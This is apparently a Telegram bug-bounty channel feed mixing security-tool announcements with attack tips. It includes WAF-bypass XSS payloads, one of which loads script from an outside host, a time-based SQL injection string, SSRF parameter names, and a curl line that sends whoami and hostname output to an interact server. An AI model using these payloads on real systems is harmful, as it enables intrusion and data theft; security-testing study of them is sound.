BugCod3
7.28K subscribers
333 photos
6 videos
7 files
442 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
SubCerts

πŸ’¬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

πŸ“Š Features:
βšͺ️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

βšͺ️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and
returns:
⚫️ HTTP status codes
⚫️ Page titles
⚫️ Silent output for clean and organized results

βšͺ️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

βšͺ️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

πŸ”Ό Installation:
cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h


πŸ’» Usage:
To run SubCerts for a domain and save the results to a file:
./subcerts.sh -u example.com --output results.txt


😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #SubDomain #certificate
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4⚑3πŸ”₯3
WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4⚑3❀2πŸ‘1
XSS

Watch out for reflected XSS in the search parameter!

Payload:
"-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>"


#XSS #BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6❀4⚑3πŸ‘3
Export to GBounty

πŸ’¬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

πŸ“Š Features:
βšͺ️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
βšͺ️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
βšͺ️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
βšͺ️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
βšͺ️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

πŸ”Ό Installation:
Prerequisites
βšͺ️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
βšͺ️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

πŸ’» Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

πŸ“‚ Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

πŸ“‚ Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:
gbounty -rf requests.zip


😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #Tips #GBounty
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯3πŸ‘1
XΩ“SS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱πŸ”₯
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#BugBounty #Tips #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6⚑3❀3
Time based SQLi Payload πŸ’£

if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

Injection Points πŸ’‰
URI
parameter name (before & after)
parameter value (before & after)
HTTP Headers like User-Agent,etc...

#SQLi #Payload
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯3πŸ‘2
HACKER search engines

#BugBounty #Search #Engines #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯7⚑3❀3
Hacking Articles- Cyber Security Mindmap

πŸ’¬
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

😸 Github

#Cyber #Security #Mindmap
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3πŸ”₯3❀2πŸ‘1
RCE - Can we still use this in HTTP Header?

`
'
;
$
>


curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server

#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀5⚑3πŸ”₯3
JSNinja - "Hunting Bugs in JavaScript!"

πŸ’¬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.

πŸ“Š Features:
βž• Extract URLs from JavaScript files!
βž• Identify sensitive information such as API keys and tokens!
βž• User-friendly interface!
βž•Open Source and actively maintained!

πŸ”Ό Installation:
sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt


πŸ’» Usage:
python3 jsninja.py -u http://example.com/script.js --secrets --urls

Command-Line Options:
βšͺ️ -u or --url: Specify a single JavaScript URL to fetch.
βšͺ️ --secrets: Look for sensitive information in the JavaScript content.
βšͺ️ --urls: Extract URLs from the JavaScript content.
βšͺ️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #JS #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘8❀6⚑3πŸ”₯3
Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}


Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:

βšͺ️ Access services on the loopback interface of the remote server
βšͺ️ Scan internal network an potentially interact with internal services
βšͺ️ Read local files on the server using file:// protocol handler
βšͺ️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4πŸ”₯4⚑2
CloudFlare XSS Bypass!

OnXSS=<Img/Src/OnError=alert(1)>


It's better than our previous <Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑7❀5πŸ”₯5🀣3πŸ‘1
XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4

Payload: β€˜>alert(154)</script><script/154=’;;;;;;;

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ”₯7❀4⚑3
Fortinet Fortigate XSS Bypass

Payload: <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
πŸ‘7πŸ”₯4❀3⚑3
πŸ¦… Blackbird πŸ¦…

πŸ’¬
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

πŸ”Ό Installation:
cd blackbird
pip install -r requirements.txt


πŸ’» Usage:
Search by username πŸ‘€
python blackbird.py --username username1 username2 username3

Search by email 🌐
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF πŸ“‚
python blackbird.py --email email1@email.com --pdf

✨ AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Osint #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀8πŸ‘4πŸ”₯3⚑2
javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))


#js #extract #urls
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀5⚑3πŸ‘3πŸ”₯3❀‍πŸ”₯2
β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$ sudo rm -rf *2024

β”Œβ”€β”€(BugCod3γ‰Ώkali)-[~]
└─$ sudo mkdir 2025


#Notification #NewYear
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸŽ‰12πŸ”₯5🍾3🀝1
CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

πŸ’¬
Description:
This script attempts to create a WebSocket connection at a random URI from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is vulnerable

Affected Versions:
βšͺ️ FortiOS 7.0.0 through 7.0.16
βšͺ️ FortiProxy 7.0.0 through 7.0.19
βšͺ️ FortiProxy 7.2.0 through 7.2.12

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #CVE #Vulnerable #Detection
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘4❀3πŸ”₯3⚑2πŸ‘Ž1
HExHTTP

πŸ’¬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

πŸ“Š Features:
βšͺ️ Server Error response checking
βšͺ️ Localhost header response analysis
βšͺ️ Vhosts checking
βšͺ️ Methods response analysis
βšͺ️ HTTP Version analysis [Experimental]
βšͺ️ Cache Poisoning DoS (CPDoS) techniques
βšͺ️ Web cache poisoning
βšͺ️ Range poisoning/error (416 response error) [Experimental]
βšͺ️ Cookie Reflection
βšͺ️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]

πŸ”Ό Installation:
pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'


πŸ’» Usage:
./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #HTTP #Headers #Analyze
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4πŸ”₯3⚑2πŸ‘2🍾1
IDOR-Forge

IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

πŸ’¬ Description:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.

πŸ“Š Features:
βšͺ️ Dynamic Payload Generation
βšͺ️ Multi-Parameter Scanning
βšͺ️ Support for Multiple HTTP Methods
βšͺ️ Concurrent Scanning
βšͺ️ Rate Limiting Detection
βšͺ️ Customizable Test Values
βšͺ️ Sensitive Data Detection
βšͺ️ Proxy Support
βšͺ️ Interactive GUI Mode
βšͺ️ Verbose Mode
βšͺ️ Output Options
βšͺ️ Custom Headers
βšͺ️ Session Handling

πŸ”Ό Installation:
pip install -r requirements.txt
python IDOR-Forge.py


πŸ’» Usage:
# CLI Basic Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1"

# Advanced Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv

python IDOR-Forge.py -u http://example.com/resource?id=1 -p -m GET --output results.csv --output-format csv --test-values [100,200,300] --sensitive-keywords ["password", "email"]


πŸ–Ό Interactive GUI Mode:
python idor_hunter.py --interactive


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Idor #Vulnerability #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀7πŸ‘4πŸ”₯3⚑2
🎯 Directory-Traversal-Payloads 🎯

List of Directory Traversal/LFI Payloads Scraped from the Internet

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Payload #Directory
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯9❀6⚑2πŸ‘2